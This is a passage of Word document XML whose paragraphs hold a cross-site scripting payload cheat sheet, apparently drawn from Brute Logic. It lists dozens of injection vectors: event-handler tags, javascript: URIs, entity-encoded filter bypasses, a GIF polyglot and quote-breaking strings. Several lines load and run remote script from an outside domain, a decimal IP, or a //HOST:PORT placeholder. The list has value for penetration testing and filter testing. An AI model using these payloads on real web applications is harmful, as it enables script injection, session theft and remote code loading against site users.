                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onmouseout=alert(1)&gt;hover this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="130A2CBB" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onmouseover=alert(1)&gt;hover this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0862B736" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onmouseup=alert(1)&gt;click this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E1B4BB6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onpaste=alert(1)&gt;paste here!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08346EB2" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E875384" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(1)&lt;!–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089BD948" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script src=//brutelogic.com.br/1.js&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DEB48F7" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script src=//3334957647/1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265B1335" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>%3Cx onxxx=alert(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EFCAC2D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onxxx=alert(1) 1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E65FE9C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E56C5A" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'onload=alert(1)&gt;&lt;svg/1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="717AB60C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'&gt;alert(1)&lt;/script&gt;&lt;script/1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BA6E638" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>*/alert(1)&lt;/script&gt;&lt;script&gt;/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDAAF90" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>*/alert(1)"&gt;'onload="/*&lt;svg/1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8DEA27" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>`-alert(1)"&gt;'onload="`&lt;svg/1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5C8E8B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>*/&lt;/script&gt;'&gt;alert(1)/*&lt;script/1='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D5430F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587A8B1D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script src=javascript:alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7037AA41" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;iframe src=javascript:alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228B6DD6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;embed src=javascript:alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0165B6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;a href=javascript:alert(1)&gt;click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A7CF16" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;math&gt;&lt;brute href=javascript:alert(1)&gt;click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC03BE8" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;form action=javascript:alert(1)&gt;&lt;input type=submit&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC726F9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;isindex action=javascript:alert(1) type=submit value=click&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622EFA64" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;form&gt;&lt;button formaction=javascript:alert(1)&gt;click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F48C9A9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;form&gt;&lt;input formaction=javascript:alert(1) type=submit value=click&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="666D317B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;form&gt;&lt;input formaction=javascript:alert(1) type=image value=click&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06103AC4" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;form&gt;&lt;input formaction=javascript:alert(1) type=image src=SOURCE&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AB2714" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;isindex formaction=javascript:alert(1) type=submit value=click&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C06F4BF" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;object data=javascript:alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E80BFD" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;iframe srcdoc=&lt;svg/o&amp;#x6Eload&amp;equals;alert&amp;lpar;1)&amp;gt;&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E20E97C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg&gt;&lt;script xlink:href=data:,alert(1) /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAA2E8F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;math&gt;&lt;brute xlink:href=javascript:alert(1)&gt;click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC90F2C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg&gt;&lt;a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?&gt;&lt;circle r=400 /&gt;&lt;animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&amp;&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4257E220" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;html ontouchstart=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408AC8FB" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;html ontouchend=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274D197B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;html ontouchmove=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D7446C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;html ontouchcancel=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0468BAAE" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onorientationchange=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CE57B6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"&gt;&lt;img src=1 onerror=alert(1)&gt;.gif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4707CB4A" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110EBE7C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>GIF89a/*&lt;svg/onload=alert(1)&gt;*/=alert(document.domain)//;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAE6466" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script src="data:&amp;comma;alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264E9697" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"&gt;&lt;script src=data:&amp;comma;alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF3EA4F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script src="//brutelogic.com.br&amp;sol;1.js&amp;num;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B70AF2B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"&gt;&lt;script src=//brutelogic.com.br&amp;sol;1.js&amp;num;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CFCCF9F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;link rel=import href="data:text/html&amp;comma;&amp;lt;script&amp;gt;alert(1)&amp;lt;&amp;sol;script&amp;gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B60025" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"&gt;&lt;link rel=import href=data:text/html&amp;comma;&amp;lt;script&amp;gt;alert(1)&amp;lt;&amp;sol;script&amp;gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16306F2D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
